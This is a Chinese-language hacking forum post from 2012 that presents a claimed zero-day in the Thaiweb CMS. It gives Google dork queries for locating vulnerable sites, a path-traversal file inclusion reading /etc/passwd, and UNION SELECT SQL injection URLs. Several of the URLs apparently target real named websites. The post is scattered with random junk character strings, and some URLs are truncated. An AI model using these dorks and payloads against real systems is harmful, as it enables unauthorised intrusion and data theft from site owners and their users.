中国网络渗透测试联盟

标题: Thaiweb远程文件sql注入漏洞0day [打印本页]

作者: admin    时间: 2012-12-27 08:38
标题: Thaiweb远程文件sql注入漏洞0day
Google之:- z0 J5 e9 ]; g; s* G$ K
, I$ }. q0 ], T7 S8 ~0 h. h
intext:powered by Thaiweb( j/ r" b# }# s; B& z  p2 o

# i" o6 n% z) ^, s2 V0 n) Ainurl:index.php?page=board.php
, M" I( C. c6 ~
" c6 w$ T0 t% c1 j2 m
! q1 ?1 z2 M4 E) ?6 _7 n
1 p3 g; M8 X9 j! Z1 P0 E利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd3 k& N) w! K9 v0 r4 h4 L

! v" J$ r) ~, t
8 c7 \- n8 P8 }7 @/ Q; {$ ?4 E  t6 a: t- V' x" |1 r/ B7 E
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
) }; x* @6 a1 l
3 b) C6 T5 T/ m+ C9 |6 P' p% S
% d: g) {8 }5 o! M1 \) E
2 K$ D; M* D: k9 T3 U+ Y  ghttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--4 [3 ~) t- I! b- d

9 E0 v/ q, ~$ _, }$ {+ s# h7 t" ?http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
1 W9 g, H6 [& E( T
( [3 p( _+ w9 U8 Y% u$ }6 jhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
( F0 K& v6 O; H$ T7 h4 z  g  |




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2